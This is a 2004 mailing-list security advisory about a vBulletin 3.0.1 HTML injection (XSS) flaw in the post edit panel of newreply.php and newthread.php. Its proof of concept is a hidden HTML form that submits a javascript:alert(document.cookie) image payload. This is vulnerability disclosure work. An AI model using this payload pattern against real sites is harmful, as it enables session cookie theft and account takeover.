Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
vBulletin HTML Injection Vuln

From: Cheng Peng Su (apple_soupmsn.com)
Date: Thu Jun 24 2004 - 07:05:18 CDT

 Advisory Name : vBulletin HTML Injection Vulnerability
  Release Date : June 24,2004
   Application : vBulletin
       Test On : 3.0.1 or others?
        Vendor : Jelsoft(http://www.vbulletin.com/)
      Discover : Cheng Peng Su(apple_soup_at_msn.com)
     From vendor's website ,it says that ,vBulletin is a powerful, scalable and
 fully customizable forums package for your web site. It has been written using
 the Web's quickest-growing scripting language; PHP, and is complimented with a
 highly efficient and ultra fast back-end database engine built using MySQL.

Proof of concept:
     While a user is previewing the post , both newreply.php and newthread.php
 do sanitize the input in 'Preview',but not Edit-panel,malicious code can be
 injected thru this flaw.
     A page as below can lead visitor to a Preview page which contains XSS code.
   <form action="http://host/newreply.php" name="vbform"
   method="post" style='visibility:hidden'>
   <input name="WYSIWYG_HTML"
   value="&lt;IMG src=&quot;javascript:alert(document.cookie)&quot;&gt;"/>
                <input name="do" value="postreply"/>
                <input name="t" value="123456" />
                <input name="p" value="123456" />
                <input type="submit" class="button" name="preview"/>

     vBulletin Team will release a patch or a fixed version as soon as possible.

  Cheng Peng Su
  Class 1,Senior 2,High school attached to Wuhan University